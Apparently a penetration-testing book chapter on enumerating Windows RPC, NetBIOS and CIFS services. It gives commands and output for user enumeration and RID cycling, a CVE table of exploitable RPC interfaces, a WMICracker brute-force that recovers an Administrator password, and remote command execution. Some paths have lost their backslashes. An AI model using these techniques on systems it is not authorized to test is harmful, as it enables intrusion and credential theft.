This chapter focuses on Microsoft RPC, NetBIOS, and CIFS services that are used in large internal networks to support file sharing, printing, and other functions. If these services aren’t configured or protected properly by network filtering devices, they can be used to great effect to enumerate system details and cause a complete network compromise.
Microsoft Windows networking services use the following ports:
loc-srv 135/tcp loc-srv 135/udp netbios-ns 137/udp netbios-dgm 138/udp netbios-ssn 139/tcp microsoft-ds 445/tcp microsoft-ds 445/udp
Port 135 is used for RPC client-server communication, and ports 139 and 445 are used for authentication and file sharing. UDP ports 137 and 138 are used for local NetBIOS browser, naming, and lookup functions.
The Server Message Block (SMB) protocol facilitates resource sharing in Microsoft Windows environments. Under Windows NT, SMB is run through NetBIOS over TCP/IP, using UDP ports 137 and 138 and TCP port 139. Windows 2000 and later support Common Internet File System (CIFS), which provides full SMB access directly through TCP and UDP port 445 (as opposed to using a variety of UDP and TCP ports). Many system administrators diligently filter access to ports between 135 and 139, but have been known to neglect port 445 when protecting Windows 2000, XP, 2003, and Vista hosts.
The Microsoft RPC endpoint mapper (also known as the DCE locator service) listens on both TCP and UDP port 135, and works much like the Sun RPC portmapper service found in Unix environments. Examples of Microsoft applications and services that use port 135 for endpoint mapping include Outlook, Exchange, and the Messenger Service.
Depending on the host configuration, the RPC endpoint mapper can be accessed through TCP and UDP port 135 via SMB with a null or authenticated session (through TCP ports 139 and 445), and as a web service listening on TCP port 593. For more information, see Todd Sabin’s presentation titled “Windows 2000, NULL Sessions and MSRPC.” Look for it at http://www.bindview.com/services/razor/resources/nullsess.ppt.
Assessment of RPC services includes the following:
Enumerating accessible RPC server interfaces and information gathering
Identifying vulnerable RPC server interfaces and components
Gleaning user and system details through LSA service interfaces (including SAMR and LSARPC)
Brute-forcing user passwords through the DCOM WMI subsystem
Executing commands through the Task Scheduler service
Starting services through the Server service
Following is a breakdown of these tasks, along with details of respective tools and techniques.
Through the RPC endpoint mapper, you can enumerate IP addresses of network interfaces (which will sometimes reveal internal network information), along with details of RPC services using dynamic high ports. The following tools can mine information from the endpoint mapper:
epdump is a Microsoft
command-line utility found in the Microsoft Windows Resource Kit.
Example 10-1 uses
epdump to query the RPC
endpoint mapper running on 192.168.189.1
(through TCP port
135).
C:> epdump 192.168.189.1
binding is 'ncacn_ip_tcp:192.168.189.1'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncadg_ip_udp:192.168.0.1[1028]
annot 'Messenger Service'
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-000000000000@ncalrpc:[LRPC00000284.00000001]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-000000000000@ncacn_ip_tcp:62.232.8.1[1025]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-000000000000@ncacn_ip_tcp:192.168.170.1[1025]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-000000000000@ncacn_ip_tcp:192.168.189.1[1025]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-000000000000@ncacn_ip_tcp:192.168.0.1[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-000000000000@ncalrpc:[LRPC00000284.00000001]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-000000000000@ncacn_ip_tcp:62.232.8.1[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-000000000000@ncacn_ip_tcp:192.168.170.1[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-000000000000@ncacn_ip_tcp:192.168.189.1[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-000000000000@ncacn_ip_tcp:192.168.0.1[1025]
annot ''
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncalrpc:[ntsvcs]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncacn_np:\\WEBSERV[\PIPE\ntsvcs]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncacn_np:\\WEBSERV[\PIPE\scerpc]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncalrpc:[DNSResolver]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncadg_ip_udp:62.232.8.1[1028]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncadg_ip_udp:192.168.170.1[1028]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncadg_ip_udp:192.168.189.1[1028]
annot 'Messenger Service'
no more entries
The responses to this query show that the NetBIOS name of the
host is WEBSERV
, and there are
four network interfaces with the following IP addresses:
62.232.8.1 |
192.168.0.1 |
192.168.170.1 |
192.168.189.1 |
Analysis of the RPC services that are running reveals that the
Messenger Service
is accessible
through UDP port 1028
, along with
two named pipes: PIPE
tsvcs
and
PIPEscerpc
. Named pipes are
accessible through SMB upon authenticating with the NetBIOS session
or CIFS services.
Servers running Microsoft Exchange return many details of subsystems that are run as RPC services, and so hundreds of results are returned when using tools such as epdump and rpcdump. The useful information includes details of internal network interfaces and RPC services running on high dynamic ports, which you can use to clarify port scan results.
Many of the RPC services listed through epdump don’t have a plaintext annotation (as the Messenger service does in Example 10-1). An example of an accessible RPC service listed without annotation is as follows:
annot '' int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 binding 00000000-000000000000@ncacn_ip_tcp:192.168.189.1[1025]
From this information you can see that this is an RPC endpoint
accessible through TCP port 1025
on 192.168.189.1
, but there is
only a 128-bit hex string to identify the service. This string is
known as the interface ID
(IFID) value.
Todd Sabin wrote two Windows utilities (rpcdump and ifids), used to query the RPC endpoint mapper using specific protocol sequences and to query specific RPC endpoints directly. The rpcdump tool can enumerate RPC service information through various protocol sequences. Its usage is as follows:
rpcdump [-v] [-p protseq] target
One of four protocol sequences can be used to access the RPC endpoint mapper, as follows:
ncacn_np (pipeepmapper named pipe through
SMB) |
ncacn_ip_tcp (direct
access to TCP port 135) |
ncadg_ip_udp (direct
access to UDP port 135) |
ncacn_http (RPC over
HTTP on TCP port 80, 593, or others) |
The -v
option enables
verbosity so that rpcdump will
enumerate all registered RPC interfaces. The -p
option allows you to specify a
particular protocol sequence to use for talking to the endpoint
mapper. If none is specified, rpcdump tries all four protocol
sequences.
rpcdump can be run much like epdump from the command line to dump details of network interfaces, IP addresses, and RPC servers. Example 10-2 shows rpcdump running to list all registered RPC endpoints through TCP port 135.
D:
pctools> rpcdump 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]
IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncalrpc:[LRPC00000290.00000001]
IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_ip_tcp:192.168.0.1[1025]
Using the verbose flag, you can walk and enumerate all IFID values for each registered endpoint. First, port 135 is queried, followed by each registered endpoint (UDP port 1028, TCP port 1025, etc.). Example 10-3 shows rpcdump used in this way to fully list all registered RPC endpoints and interfaces.
D:
pctools> rpcdump -v 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]
RpcMgmtInqIfIds succeeded
Interfaces: 16
367abb81-9844-35f1-ad32-98f038001003 v2.0
93149ca2-973b-11d1-8c39-00c04fb984f9 v0.0
82273fdc-e32a-18c3-3f78-827929dc23ea v0.0
65a93890-fab9-43a3-b2a5-1e330ac28f11 v2.0
8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0
6bffd098-a112-3610-9833-46c3f87e345a v1.0
8d0ffe72-d252-11d0-bf8f-00c04fd9126b v1.0
c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0
0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 v1.0
4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
300f3532-38cc-11d0-a3f0-0020af6b0add v1.2
6bffd098-a112-3610-9833-012892020162 v0.0
17fdd703-1827-4e34-79d4-24a55c53bb37 v1.0
5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
3ba0ffc0-93fc-11d0-a4ec-00a0c9062910 v1.0
8c7daf44-b6dc-11d1-9a4c-0020af6e7c57 v1.0
IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncalrpc:[LRPC00000290.00000001]
IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_ip_tcp:192.168.0.1[1025]
RpcMgmtInqIfIds succeeded
Interfaces: 2
1ff70682-0a51-30e8-076d-740be8cee98b v1.0
378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
If you can’t connect to the portmapper through TCP port 135,
use UDP port 135 to enumerate registered RPC endpoints with the
-p ncadg_ip_udp
option, shown in
Example 10-4.
D:
pctools> rpcdump -p ncadg_ip_udp 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]
IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncalrpc:[LRPC00000290.00000001]
IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_ip_tcp:192.168.0.1[1025]
The ifids utility queries specific RPC endpoints (such as UDP 1029 or TCP 1025) to identify accessible services. A practical application of the ifids utility is to enumerate RPC services running on high ports when the RPC portmapper service isn’t accessible.
The ifids
usage is:
ifids [-p protseq] [-e endpoint
]target
The -p
option specifies
which protocol sequence to use when talking to the server, and the
-e
option specifies which port to
connect to. In Example 10-5, I use
ifids to connect to TCP port
1025 and list the accessible interfaces.
D:
pctools> ifids -p ncacn_ip_tcp -e 1025 192.168.189.1
Interfaces: 2
1ff70682-0a51-30e8-076d-740be8cee98b v1.0
378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
By referring to the list of known IFID values, you can see that these two interfaces are Microsoft Task Scheduler (mstask.exe) listeners. Example 10-6 shows how to use the ifids tool to enumerate the IFID values of RPC services accessible through UDP port 1028.
D:
pctools> ifids -p ncadg_ip_udp -e 1028 192.168.189.1
Interfaces: 16
367abb81-9844-35f1-ad32-98f038001003 v2.0
93149ca2-973b-11d1-8c39-00c04fb984f9 v0.0
82273fdc-e32a-18c3-3f78-827929dc23ea v0.0
65a93890-fab9-43a3-b2a5-1e330ac28f11 v2.0
8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0
6bffd098-a112-3610-9833-46c3f87e345a v1.0
8d0ffe72-d252-11d0-bf8f-00c04fd9126b v1.0
c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0
0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 v1.0
4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
300f3532-38cc-11d0-a3f0-0020af6b0add v1.2
6bffd098-a112-3610-9833-012892020162 v0.0
17fdd703-1827-4e34-79d4-24a55c53bb37 v1.0
5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
3ba0ffc0-93fc-11d0-a4ec-00a0c9062910 v1.0
8c7daf44-b6dc-11d1-9a4c-0020af6e7c57 v1.0
Urity (http://www.securityfriday.com)
wrote a graphical Windows version of the rpcdump tool called RpcScan. In the same
way rpcdump -v
works, RpcScan
queries each registered RPC endpoint and enumerates all the IFID
values. Urity spent time researching IFID values and idiosyncrasies,
referencing them in the RpcScan output. Figure 10-1 shows the tool
in use against 192.168.189.1.
Upon enumerating accessible RPC endpoints and associated IFID values, it is necessary to cross-reference them with known Microsoft RPC service issues, and further test them using exploitation frameworks and similar tools. Table 10-1 lists IFID values that have known remotely exploitable issues, as found in MITRE CVE. Table 10-2 lists other useful IFID values that can be used to enumerate users, perform password grinding, and execute commands.
IFID | Service details | CVE reference(s) |
12345678-1234-abcd-ef00-0123456789ab | Print spooler service | CVE-2005-1984 |
17fdd703-1827-4e34-79d4-24a55c53bb37 | Messenger service | CVE-2003-0717 |
2f5f3220-c126-1076-b549-074d078619da | NetDDE service | CVE-2004-0206 |
2f5f6520-ca46-1067-b319-00dd010662da | Telephony service | CVE-2005-0058 |
342cfd40-3c6c-11ce-a893-08002b2e9c6d | License and Logging Service (LLSRV) interface | CVE-2005-0050 |
3919286a-b10c-11d0-9ba8-00c04fd92ef5 | LSASS interface | CVE-2003-0533 |
4b324fc8-1670-01d3-1278-5a47bf6ee188 | Server service | CVE-2005-0051 CVE-2006-3439 |
4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 | DCOM interface | CVE-2003-0352 CVE-2003-0528 CVE-2003-0715 CVE-2004-0124 |
50abc2a4-574d-40b3-9d66-ee4fd5fba076 | DNS server service | CVE-2007-1748 |
5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc | Messenger service | CVE-2003-0717 |
6bffd098-a112-3610-9833-46c3f87e345a | Workstation service | CVE-2003-0812 CVE-2006-4691 |
8d9f4e40-a03d-11ce-8f69-08003e30051b | Plug and Play service | CVE-2005-1983 CVE-2005-2120 |
8f09f000-b7ed-11ce-bbd2-00001a181cad | Remote Access Service Manager (RASMAN) interface | CVE-2006-2370 CVE-2006-2371 |
c8cb7687-e6d3-11d2-a958-00c04f682e16 | WebDAV client service | CVE-2006-0013 |
d6d70ef0-0e3b-11cb-acc3-08002b1d29c3 | RPC locator service | CVE-2003-0003 |
e67ab081-9844-3521-9d32-834f038001c0 | Client service for NetWare | CVE-2005-1985 CVE-2006-4688 |
e1af8308-5d1f-11c9-91a4-08002b14a0fa | RPC endpoint mapper | CVE-2002-1561 |
fdb3a030-065f-11d1-bb9b-00a024ea5525 | Message Queuing (MQ) and MSDTC services | CVE-2005-0059 CVE-2005-2119 CVE-2006-0034 CVE-2006-1184 |
IFID | Service comments |
12345778-1234-abcd-ef00-0123456789ab | LSA interface, used to enumerate users |
12345778-1234-abcd-ef00-0123456789ac | LSA SAMR interface, used to access the public components of the SAM database, including usernames |
1ff70682-0a51-30e8-076d-740be8cee98b | Task scheduler, used to remotely execute commands (with a valid username/password) |
338cd001-2244-31f1-aaaa-900038001003 | Remote registry service, used to remotely access and modify the system registry (depending on permissions and access rights) |
4b324fc8-1670-01d3-1278-5a47bf6ee188 | Server service, used to remotely start and stop services on the host |
4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 | DCOM WMI interface, used for brute-force password grinding and information gathering |
If administrative credentials are known (such as the Administrator account password), the LSA and SAMR interfaces can be used to add users and elevate rights and privileges accordingly. These commands and issues are discussed in the following sections.
I only cover Microsoft RPC endpoints with significant security implications here. Jean-Baptiste Marchand has assembled an excellent series of documents that cover Microsoft RPC interfaces and named pipe endpoints. His “Windows network services internals” page should be reviewed for current up-to-date details of Microsoft RPC issues, accessible at http://www.hsc.fr/ressources/articles/win_net_srv/.
A number of remotely exploitable RPC interface issues have been publicized over recent years, as listed in Table 10-3.
CVE reference(s) | Advisory | Notes | Exploit framework support | ||
IMPACT | CANVAS | MSF | |||
CVE-2007-1748 | MS07-029 | DNS server service interface zone name overflow | ✓ | ✓ | ✓ |
CVE-2006-4691 | MS06-070 | Workstation service overflow | ✓ | ✓ | |
CVE-2006-4688 | MS06-066 | Microsoft Netware client service overflow | ✓ | ✓ | ✓ |
CVE-2006-3439 | MS06-040 | Server service overflow | ✓ | ✓ | ✓ |
CVE-2006-2371 | MS06-025 | Remote Access Service Manager (RASMAN) registry corruption vulnerability | ✓ | ✓ | |
CVE-2006-2370 | MS06-025 | Routing and Remote Access Service (RRAS) memory corruption vulnerability | ✓ | ✓ | ✓ |
CVE-2005-1985 | MS05-046 | Microsoft Netware client service overflow | ✓ | ✓ | |
CVE-2005-1984 | MS05-043 | Print spooler service overflow | ✓ | ✓ | |
CVE-2005-1983 | MS05-039 | Plug and Play service overflow | ✓ | ✓ | ✓ |
CVE-2005-0059 | MS05-017 | Message Queuing (MSMQ) RPC overflow | ✓ | ✓ | ✓ |
CVE-2005-0058 | MS05-040 | Telephony service overflow | ✓ | ✓ | |
CVE-2005-0050 | MS05-010 | License and Logging Service (LLSSRV) overflow | ✓ | ✓ | |
CVE-2004-0206 | MS04-031 | NetDDE service overflow | ✓ | ✓ | ✓ |
CVE-2003-0818 | MS04-007 | Local Security Authority Subsystem Service (LSASS) ASN.1 overflow | ✓ | ✓ | ✓ |
CVE-2003-0812 | MS03-049 | Workstation service overflow | ✓ | ✓ | ✓ |
CVE-2003-0717 | MS03-043 | Messenger service overflow | ✓ | ✓ | |
CVE-2003-0715 and CVE-2003-0528 | MS03-039 | DCOM interface heap overflows | ✓ | ||
CVE-2003-0533 | MS04-011 | Local Security Authority Subsystem Service (LSASS) overflow | ✓ | ✓ | ✓ |
CVE-2003-0352 | MS03-026 | DCOM interface stack overflow | ✓ | ✓ | ✓ |
CVE-2003-0003 | MS03-001 | RPC locator service overflow | ✓ | ✓ |
A number of these issues, including CVE-2006-3439 (Server service overflow) and CVE-2003-0533 (LSASS overflow) are also exploitable through named pipes, depending on configuration and network filtering, accessible via NetBIOS (TCP port 139) and CIFS (TCP port 445). CVE-2003-0818 is exploitable through any mechanism supporting NTLM authentication, including NetBIOS (SMB), HTTP, and SMTP.
A number of RPC queries can be issued to accessible LSARPC and SAMR RPC service endpoints (running over TCP, UDP, HTTP, or named pipes). Named pipes access is provided across SMB sessions, accessible via the NetBIOS session service (TCP port 139), and CIFS service (TCP port 445).
The walksam utility
(found in Todd Sabin’s rpctools
package) queries the SAMR named pipe interface (pipesamr) to glean user information.
Example 10-7 shows
walksam being used across a
local Windows network to walk the SAMR interface of 192.168.1.1
.
D:
pctools> walksam 192.168.1.1
rid 500: user Administrator
Userid: Administrator
Description: Built-in account for administering the computer/domain
Last Logon: 8/12/2003 19:16:44.375
Last Logoff: never
Last Passwd Change: 8/13/2002 18:43:52.468
Acct. Expires: never
Allowed Passwd Change: 8/13/2002 18:43:52.468
Rid: 500
Primary Group Rid: 513
Flags: 0x210
Fields Present: 0xffffff
Bad Password Count: 0
Num Logons: 101
rid 501: user Guest
Userid: Guest
Description: Built-in account for guest access to the computer/domain
Last Logon: never
Last Logoff: never
Last Passwd Change: never
Acct. Expires: never
Allowed Passwd Change: never
Rid: 501
Primary Group Rid: 513
Flags: 0x215
Fields Present: 0xffffff
Bad Password Count: 0
Num Logons: 0
The walksam utility also
supports additional protocol sequences used by Windows 2000 Domain
Controllers. The SAMR interface must first be found (IFID 12345778-1234-abcd-ef00-0123456789ac
)
using rpcdump or a similar tool
to list all the registered endpoints; it’s then accessed using
walksam with the correct
protocol sequence (over named pipes, TCP, UDP, or HTTP).
Windows enumeration tools, such as walksam, that use RID cycling to list users (through looking up RID 500, 501, 502, etc.) identify the administrator account, even if it has been renamed.
Example 10-8
shows walksam in use against a
Windows 2000 domain controller running a SAMR interface through the
ncacn_ip_tcp
endpoint at TCP port
1028.
D:
pctools> walksam -p ncacn_ip_tcp -e 1028 192.168.1.10
rid 500: user Administrator
Userid: Administrator
Description: Built-in account for administering the computer/domain
Last Logon: 8/6/2003 11:42:12.725
Last Logoff: never
Last Passwd Change: 2/11/2003 09:12:50.002
Acct. Expires: never
Allowed Passwd Change: 2/11/2003 09:12:50.002
Rid: 500
Primary Group Rid: 513
Flags: 0x210
Fields Present: 0xffffff
Bad Password Count: 0
Num Logons: 101
rpcclient (part of the Unix Samba package from http://www.samba.org) can be used to interact with RPC service endpoints across SMB and named pipes (accessible through the NetBIOS session and CIFS services). The tool has an extraordinary number of features and usage options—far too many to list here. Before using the rpcclient tool, I recommend that you review http://www.samba-tng.org/docs/tng/htmldocs/rpcclient.8.html. Table 10-4 lists the useful SAMR and LSARPC interface commands that can be issued through the rpcclient utility upon establishing an SMB session.
By default, Windows systems and Windows 2003 domain controllers allow anonymous (null session) access to SMB, so these interfaces can be queried in this way. If null session access to SMB is not permitted, a valid username and password must be provided to access the LSARPC and SAMR interfaces.
Command | Interface | Description |
queryuser | SAMR | Retrieve user information |
querygroup | SAMR | Retrieve group information |
querydominfo | SAMR | Retrieve domain information |
enumdomusers | SAMR | Enumerate domain users |
enumdomgroups | SAMR | Enumerate domain groups |
createdomuser | SAMR | Create a domain user |
deletedomuser | SAMR | Delete a domain user |
lookupnames | LSARPC | Look up usernames to SID values |
lookupsids | LSARPC | Look up SIDs to usernames (RID cycling) |
lsaaddacctrights | LSARPC | Add rights to a user account |
lsaremoveacctrights | LSARPC | Remove rights from a user account |
Example 10-9
shows rpcclient in use against
a remote system at 192.168.0.25
to perform RID cycling and enumerate users through the LSARPC named
pipe (pipelsarpc). In this
example we first look up the full SID value of the chris account, and then increment the RID
value (1001 through to 1007) to enumerate the other user accounts
through the LSARPC interface.
$rpcclient -I 192.168.0.25 -U=chris%password WEBSERV
rpcclient>lookupnames chris
chris S-1-5-21-1177238915-1563985344-1957994488-1003 (User: 1) rpcclient>lookupsids S-1-5-21-1177238915-1563985344-1957994488-1001
S-1-5-21-1177238915-1563985344-1957994488-1001 WEBSERVIUSR_WEBSERV rpcclient>lookupsids S-1-5-21-1177238915-1563985344-1957994488-1002
S-1-5-21-1177238915-1563985344-1957994488-1002 WEBSERVIWAM_WEBSERV rpcclient>lookupsids S-1-5-21-1177238915-1563985344-1957994488-1003
S-1-5-21-1177238915-1563985344-1957994488-1003 WEBSERVchris rpcclient>lookupsids S-1-5-21-1177238915-1563985344-1957994488-1004
S-1-5-21-1177238915-1563985344-1957994488-1004 WEBSERVdonald rpcclient>lookupsids S-1-5-21-1177238915-1563985344-1957994488-1005
S-1-5-21-1177238915-1563985344-1957994488-1005 WEBSERV est rpcclient>lookupsids S-1-5-21-1177238915-1563985344-1957994488-1006
S-1-5-21-1177238915-1563985344-1957994488-1006 WEBSERVdaffy rpcclient>lookupsids S-1-5-21-1177238915-1563985344-1957994488-1007
result was NT_STATUS_NONE_MAPPED rpcclient>
Alternatively, you can use the enumdomusers
command to simply list all
users through a forward lookup (this technique will not work if
RestrictAnonymous=1
, and RID
cycling must be used), as shown in Example 10-10.
rpcclient> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[chris] rid:[0x3eb]
user:[daffy] rid:[0x3ee]
user:[donald] rid:[0x3ec]
user:[Guest] rid:[0x1f5]
user:[IUSR_WEBSERV] rid:[0x3e9]
user:[IWAM_WEBSERV] rid:[0x3ea]
user:[test] rid:[0x3ed]
user:[TsInternetUser] rid:[0x3e8]
The rpcclient tool is extremely powerful and versatile; it allows user accounts to be created remotely and privileges to be elevated. However, this functionality requires a valid username and password combination, often necessitating the use of brute force.
Jean-Baptiste Marchand posted an advisory to BugTraq on July 7, 2005 (http://marc.info/?l=bugtraq&m=112076409813099&w=2), describing a flaw within Windows 2003 SP1, Windows XP SP2, Windows 2000 SP4, and Windows NT 4.0 systems, allowing for an anonymous SMB null session to be established with NetBIOS and CIFS services, which in turn can be used to anonymously access RPC server named pipe interfaces, as follows:
Local Security Authority (LSA) RPC server (pipelsarpc)
LSA Security Account Manager (SAM) RPC server (pipesamr)
LSA Netlogon RPC server (pipe etlogon)
Service Control Manager (SCM) RPC server (pipesvcctl)
Eventlog service RPC server (pipeeventlog)
Server service RPC server (pipesrvsvc)
Workstation service RPC server (pipewkssvc)
These service endpoints can be queried using tools such as Samba rpcclient, allowing remote unauthenticated attackers to enumerate users and groups, view running services, and view the server event logs under Windows NT 4.0 and Windows 2000 SP4 in their default configurations. Windows Server 2003 Active Directory and domain controllers are also susceptible, although Windows XP SP2 is largely shielded from these vulnerabilities.
John-Baptiste Marchand’s presentation covering null sessions and RPC named pipes is available from http://www.hsc.fr/ressources/presentations/null_sessions/. He discusses hardcoded named pipes that are present in Windows XP SP1 and earlier, and how these can be used to proxy RPC queries and commands to other RPC named pipe interfaces that run within the same service instance server-side.
In 2002, the Chinese hacking group netXeyes developed WMICracker (http://www.netxeyes.org/wmicracker.exe). The tool accesses DCOM Windows Management Interface (WMI) components to brute-force passwords of users in the Administrators group.
Example 10-11 shows
WMICracker in use against port 135 of 192.168.189.2
to brute-force the
Administrator password using the dictionary file words.txt.
C:> WMICracker 192.168.189.1 Administrator words.txt
WMICracker 0.1, Protype for Fluxay5. by netXeyes 2002.08.29
http://www.netXeyes.com, [email protected]
Waiting For Session Start....
Testing qwerty...Access is denied.
Testing password...Access is denied.
Testing secret...Access is denied.
Administrator's Password is control
The venom utility also brute-forces user passwords across WMI. At the time of writing, venom is available at http://www.cqure.net/tools/venom-win32-1_1_5.zip.
WMIdump (http://www.cqure.net/wp/?page_id=28) is a Windows tool that can be used to query the WMI subsystem and dump useful internal system information. At the time of writing, the current binary is available from http://www.cqure.net/tools/wmidump-dotnet-1_3_0.zip.
In particular, WMIdump is used to enumerate the following for a given Windows host:
Operating system and computer details
System accounts and users
Installed hotfixes
Running processes
Running services and settings
Installed software and patch levels
Network adapters installed and associated settings
Serial port and modem settings
Logical disks
WMIdump is shown in Example 10-12 dumping system details, including user accounts, from the remote host over WMI.
C:>WMIdump -c configstandard.config -u Administrator -p control -t 192.168.189.2
WMIDump v1.3.0 by [email protected] ----------------------------------- Dumping 192.168.189.2:Win32_Process Dumping 192.168.189.2:Win32_LogicalDisk Dumping 192.168.189.2:Win32_NetworkConnection Dumping 192.168.189.2:Win32_ComputerSystem Dumping 192.168.189.2:Win32_OperatingSystem Dumping 192.168.189.2:Win32_Service Dumping 192.168.189.2:Win32_SystemUsers Dumping 192.168.189.2:Win32_ScheduledJob Dumping 192.168.189.2:Win32_Share Dumping 192.168.189.2:Win32_SystemAccount Dumping 192.168.189.2:Win32_LogicalProgramGroup Dumping 192.168.189.2:Win32_Desktop Dumping 192.168.189.2:Win32_Environment Dumping 192.168.189.2:Win32_SystemDriver Dumping 192.168.189.2:Win32_NetworkClient Dumping 192.168.189.2:Win32_NetworkProtocol Dumping 192.168.189.2:Win32_ComputerSystemProduct Dumping 192.168.189.2:Win32_QuickFixEngineering C:>dir 192.168.189.2
Volume in drive C is HARDDISK Volume Serial Number is 846A-8EA9 Directory of C:192.168.189.2 08/07/2007 17:52 <DIR> . 08/07/2007 17:52 <DIR> .. 08/07/2007 17:52 1,183 Win32_ComputerSystem.dmp 08/07/2007 17:52 196 Win32_ComputerSystemProduct.dmp 08/07/2007 17:52 912 Win32_Desktop.dmp 08/07/2007 17:52 2,747 Win32_Environment.dmp 08/07/2007 17:52 768 Win32_LogicalDisk.dmp 08/07/2007 17:52 18,387 Win32_LogicalProgramGroup.dmp 08/07/2007 17:52 717 Win32_NetworkClient.dmp 08/07/2007 17:52 0 Win32_NetworkConnection.dmp 08/07/2007 17:52 6,655 Win32_NetworkProtocol.dmp 08/07/2007 17:52 1,573 Win32_OperatingSystem.dmp 08/07/2007 17:52 24,848 Win32_Process.dmp 08/07/2007 17:52 17,032 Win32_QuickFixEngineering.dmp 08/07/2007 17:52 0 Win32_ScheduledJob.dmp 08/07/2007 17:52 38,241 Win32_Service.dmp 08/07/2007 17:52 274 Win32_Share.dmp 08/07/2007 17:52 2,382 Win32_SystemAccount.dmp 08/07/2007 17:52 55,184 Win32_SystemDriver.dmp 08/07/2007 17:52 1,262 Win32_SystemUsers.dmp 18 File(s) 172,361 bytes 2 Dir(s) 103,497,728 bytes free C:>type 192.168.189.2Win32_SystemUsers.dmp
GroupComponent;PartComponent; \WEBSERV ootcimv2:Win32_ComputerSystem.Name="WEBSERV";\WEBSERV ootcimv2: Win32_UserAccount.Name="Administrator",Domain="OFFICE"; \WEBSERV ootcimv2:Win32_ComputerSystem.Name="WEBSERV";\WEBSERV ootcimv2: Win32_UserAccount.Name="ASPNET",Domain="OFFICE"; \WEBSERV ootcimv2:Win32_ComputerSystem.Name="WEBSERV";\WEBSERV ootcimv2: Win32_UserAccount.Name="Guest",Domain="OFFICE"; \WEBSERV ootcimv2:Win32_ComputerSystem.Name="WEBSERV";\WEBSERV ootcimv2: Win32_UserAccount.Name="__vmware_user__",Domain="OFFICE";
After compromising a valid password of a user in the Administrators group, you can execute commands through the Task Scheduler interface. To do so, Urity developed a Windows utility called Remoxec; it’s available from http://www.securityfriday.com and the O’Reilly tools archive at http://examples.oreilly.com/networksa/tools/remoxec101.zip. Figure 10-2 shows the tool in use; it requires the target IP address and valid credentials.
The NetBIOS name service is accessible through UDP port 137. The service processes NetBIOS Name Table (NBT) requests in environments where Windows is being used along with workgroups, domains, or Active Directory components.
You can easily enumerate the following system details by querying the name service:
NetBIOS hostname
The domain of which the system is a member
Authenticated users currently using the system
Accessible network interface MAC addresses
The inbuilt Windows nbtstat
command can enumerate these details remotely. Example Example 10-13 shows how it can
be run against 192.168.189.1
.
C:> nbtstat -A 192.168.189.1
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
WEBSERV <00> UNIQUE Registered
